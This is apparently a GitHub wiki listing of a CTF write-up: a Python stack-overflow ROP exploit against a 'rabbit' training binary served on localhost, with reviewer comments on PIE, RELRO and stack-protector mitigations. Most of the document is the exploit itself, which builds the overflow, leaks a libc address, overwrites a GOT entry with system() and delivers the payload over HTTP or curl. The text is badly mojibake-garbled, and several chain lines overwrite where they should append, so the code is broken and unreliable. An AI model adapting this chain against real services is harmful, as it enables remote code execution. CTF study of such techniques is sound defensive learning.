
#!/usr/bin/python
# Write-up listing (GitHub wiki page) of a stack-overflow ROP chain against the
# "rabbit" CTF training target. Reviewer notes, read from the defender's side:
# - The quoting throughout is mojibake (curly quotes rendered as multi-byte
#   garbage, the hex prefix rendered as a multiplication sign, "print(r)"
#   collapsed into a single glyph), so the listing is not runnable as printed;
#   it documents the technique rather than providing a tool.
# - The chain depends on fixed 0x40xxxx code addresses and on overwriting a
#   GOT slot (see the "read() in GOT" comments below) -- presumably a non-PIE
#   binary without full RELRO. Building the target as PIE with full RELRO
#   (GOT made read-only after relocation) and with stack protector would remove
#   exactly the primitives this chain relies on; TODO confirm against the
#   actual target binary, which is not shown on this page.
# - All offsets and gadget addresses are empirical for this one build, as the
#   author's own "turns out to be 535" remark makes clear.
import os, sys, socket
import struct
import requests

#cmd = sys.argv1+"\0"
cmd = โ€˜lsโ€™

#payload for Option 1: GET request, needs some filler or err โ€“ โ€˜Aโ€™ * 4 to be taken off buffer
payload = rโ€™http://localhost:9999/\AAAAโ€™

#Payload for Option 2: CURL
#payload = โ€™โ€™

#filler โ€“ fill buffer with Aโ€™s , thought this would be 536 โ€“ 4, but turns out to be 535
payload += โ€˜Aโ€™ * (535 โ€“ 4)

#overwrite RBX โ€“ offset 536
payload += โ€˜Bโ€™ * 8

#overwrite RBP โ€“ offset 544
payload += โ€˜Cโ€™ * 8

#fill before start of RSP โ€“ offset 568
payload += โ€˜Dโ€™ * 16

#write stdin to .dynamic using read@plt (0000000000400cf0 <read@plt>:)
someother = struct.pack(โ€œ<Iโ€, 0ร—000400cf0) #read() call loc
someother += struct.pack(โ€œ<Iโ€, 0ร—000401787) #PPPR
someother += struct.pack(โ€œ<Iโ€, 0) #stdin
someother += struct.pack(โ€œ<Iโ€, 0ร—000602e28) #.dynamic addr
someother += struct.pack(โ€œ<Iโ€, len(cmd)) #len of cmd

#leak address of read() in randomised libc
someother += struct.pack(โ€œ<Iโ€, 0ร—400c50) #write() call loc
someother += struct.pack(โ€œ<Iโ€, 0ร—000401787) #PPPR
someother += struct.pack(โ€œ<Iโ€, 1) #stdout
someother += struct.pack(โ€œ<Iโ€, 0ร—000603088) #read() in GOT
someother += struct.pack(โ€œ<Iโ€, 8) #len

#call read@plt to overwrite the ptr stored in GOT
someother = struct.pack(โ€œ<Iโ€, 0ร—000400cf0) #read() call loc
someother += struct.pack(โ€œ<Iโ€, 0ร—000401787) #PPPR
someother += struct.pack(โ€œ<Iโ€, 0) #stdin
someother += struct.pack(โ€œ<Iโ€, 0ร—000603088) #read() in GOT
someother += struct.pack(โ€œ<Iโ€, 8) #len

#call read@plt with address of system() in libc
someother = struct.pack(โ€œ<Iโ€, 0ร—000400cf0) #read() call loc
someother += โ€˜FFFFFFFFโ€™ # bogus
someother += struct.pack(โ€œ<Iโ€, 0ร—000602e28) #.dynamic addr system()

#padding โ€“ continue filler, writing into RSP
#payload += โ€˜Eโ€™ * 135
payload = payload + someother
payload += โ€˜Eโ€™ * (135 โ€“ len(someother))

# NOTE(review): the two numbered headings below are the writeup's own section
# markers that the wiki rendered as list items; they are not Python.
  1. Payload delivery Option1: requests.get #
    r = requests.get(payload)
    print(r.status_code)
    print(len(payload))
    printยฎ
  1. Payload delivery Option2: system cmd curl #
    #print(โ€œSending payload of total length {}โ€.format(len(payload)))
    #system(โ€œ/usr/bin/curl -g localhost:9999/\โ€" +payload + โ€œ\โ€")
โš ๏ธ **GitHub.com Fallback** โš ๏ธ